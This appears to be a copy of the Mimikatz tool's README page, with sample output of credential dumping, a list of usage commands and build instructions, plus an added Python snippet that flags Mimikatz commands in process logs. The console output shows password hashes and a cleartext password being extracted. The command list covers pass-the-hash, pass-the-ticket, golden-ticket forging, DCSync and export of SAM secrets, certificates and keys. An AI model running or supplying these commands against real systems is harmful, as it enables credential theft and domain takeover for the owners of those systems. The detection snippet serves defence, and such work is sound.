Mimikatz : A little Tool to Play with Windows Security
Mimikatz is a tool I’ve made to learn C and make some experiments with Windows security.
Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
http://blog.gentilkiwi.com/mimikatz (oe.eo)
with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
…
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
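As an added example (not part of mimikatz or of the original page), here is one way a defender could flag the module::command syntax listed above in process-creation logs, whatever the binary is called. The log records are constructed sample data, and the function names and labels are this example's own.

```python
import re

# Modules that appear in the command list on this page.
MODULES = ("privilege", "sekurlsa", "kerberos", "crypto", "vault", "token", "lsadump")

# The page names these three techniques; pairing each with a command is this
# example's own mapping. Everything else gets a module-level label.
TECHNIQUES = {
    "sekurlsa::pth": "pass-the-hash",
    "kerberos::ptt": "pass-the-ticket",
    "kerberos::golden": "golden ticket",
}

# Match module::command whatever the binary is called, in any letter case,
# with or without surrounding quotes.
TOKEN = re.compile(r"\b(%s)::([a-z]+)" % "|".join(MODULES), re.IGNORECASE)

def find_mimikatz_commands(command_line):
    """Return (command, label) for every module::command token found."""
    hits = []
    for match in TOKEN.finditer(command_line):
        module, command = match.group(1).lower(), match.group(2).lower()
        name = f"{module}::{command}"
        hits.append((name, TECHNIQUES.get(name, f"{module} module")))
    return hits

def triage(events):
    """events: (host, command_line) pairs. Return one alert per matching event."""
    alerts = []
    for host, command_line in events:
        hits = find_mimikatz_commands(command_line)
        if hits:
            alerts.append({"host": host,
                           "commands": [name for name, _ in hits],
                           "labels": sorted({label for _, label in hits})})
    return alerts

# Constructed process-creation records (host, command line); not real logs.
SAMPLE_EVENTS = [
    ("WS01", r'C:\Tools\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    ("WS02", r'C:\Temp\renamed.exe "SEKURLSA::pth /user:Administrateur /domain:winxp /ntlm:<hash> /run:cmd"'),
    ("WS03", r'C:\Windows\System32\cmd.exe /c dir C:\Users'),
    ("DC01", r'C:\Temp\renamed.exe "lsadump::dcsync /user:domain\krbtgt /domain:lab.local"'),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["commands"], alert["labels"])
```

It only sees commands passed as process arguments, so it is one signal to combine with other telemetry.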
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)
Build the solution
Build / Build Solution (you can change architecture)
mimikatz is now built and ready to be used! (Win32 / x64)
If you get error MSB3073 about _build_.cmd and mimidrv, it’s because the driver cannot be built without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.
With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Credit: Benjamin DELPY & Vincent LE TOUX